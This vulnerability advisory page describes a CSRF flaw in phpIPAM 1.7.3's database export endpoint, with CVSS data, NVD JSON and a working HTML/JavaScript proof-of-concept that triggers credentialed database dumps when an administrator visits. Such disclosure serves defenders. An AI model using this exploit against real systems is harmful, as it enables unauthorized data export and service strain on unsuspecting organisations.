Security Vulnerability Report
CVE-2025-60912 CVSS 3.3 LOW

Published: 2025-12-08 15:15:50
Last Modified: 2025-12-10 17:36:32

Description

phpIPAM v1.7.3 contains a Cross-Site Request Forgery (CSRF) vulnerability in the database export functionality. The generate-mysql.php function, located in the /app/admin/import-export/ endpoint, allows remote attackers to trigger large database dump downloads via crafted HTTP GET requests if an administrator has an active session.

CVSS Details

CVSS Score
3.3
Severity
LOW
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:L/I:N/A:L

Configurations (Affected Products)

cpe:2.3:a:phpipam:phpipam:*:*:*:*:*:*:*:* - VULNERABLE
phpIPAM <= 1.7.3 (versionEndIncluding: 1.7.3; v1.7.3 itself is affected, as the description states)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```html
<!-- CSRF PoC for CVE-2025-60912 -->
<!-- Auto-trigger database export for phpIPAM v1.7.3 -->
<!DOCTYPE html>
<html>
<head>
  <title>phpIPAM Database Export CSRF</title>
</head>
<body>
  <h2>CVE-2025-60912 CSRF Attack</h2>
  <p>If you see this message, the attack is in progress...</p>
  <script type="text/javascript">
    // Fire the request as soon as a logged-in phpIPAM administrator loads this page
    window.onload = function() {
      // Target phpIPAM database export endpoint
      var targetUrl = 'http://target-ip/app/admin/import-export/generate-mysql.php';
      // Cross-site GET. credentials: 'include' asks the browser to attach the
      // victim's phpIPAM session cookie; the browser only does so if the cookie
      // is allowed cross-site (i.e. not SameSite=Lax/Strict). The server runs the
      // export as soon as the request arrives, whatever happens to the response.
      fetch(targetUrl, {
        method: 'GET',
        credentials: 'include'
      })
      .then(response => response.blob())
      .then(blob => {
        // Only reached if phpIPAM answers with permissive CORS headers; otherwise
        // the browser refuses the cross-origin read and the dump is never
        // visible to this page, and the .catch branch below runs instead.
        var url = window.URL.createObjectURL(blob);
        var a = document.createElement('a');
        a.href = url;
        a.download = 'phpipam_database_export.sql';
        document.body.appendChild(a);
        a.click();
        window.URL.revokeObjectURL(url);
      })
      // A CORS TypeError here still means the request was sent with cookies
      .catch(error => console.log('Export triggered: ' + error));
    };
  </script>
</body>
</html>
```

References

https://gist.github.com/amandrei/a8377d9b71c55156d22aaaf485463d15 (Third Party Advisory)
https://github.com/phpipam/phpipam (Product)

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-60912",
    "sourceIdentifier": "[email protected]",
    "published": "2025-12-08T15:15:50.450",
    "lastModified": "2025-12-10T17:36:31.633",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "phpIPAM v1.7.3 contains a Cross-Site Request Forgery (CSRF) vulnerability in the database export functionality. The generate-mysql.php function, located in the /app/admin/import-export/ endpoint, allows remote attackers to trigger large database dump downloads via crafted HTTP GET requests if an administrator has an active session."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:L/I:N/A:L",
            "baseScore": 3.3,
            "baseSeverity": "LOW",
            "attackVector": "NETWORK",
            "attackComplexity": "HIGH",
            "privilegesRequired": "HIGH",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "NONE",
            "availabilityImpact": "LOW"
          },
          "exploitabilityScore": 0.7,
          "impactScore": 2.5
        }
      ]
    },
    "weaknesses": [
      {
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-352"
          }
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:phpipam:phpipam:*:*:*:*:*:*:*:*",
                "versionEndIncluding": "1.7.3",
                "matchCriteriaId": "ECCAE1A5-738E-4649-BAF4-ACC14A8562BA"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://gist.github.com/amandrei/a8377d9b71c55156d22aaaf485463d15",
        "source": "[email protected]",
        "tags": ["Third Party Advisory"]
      },
      {
        "url": "https://github.com/phpipam/phpipam",
        "source": "[email protected]",
        "tags": ["Product"]
      }
    ]
  }
}
```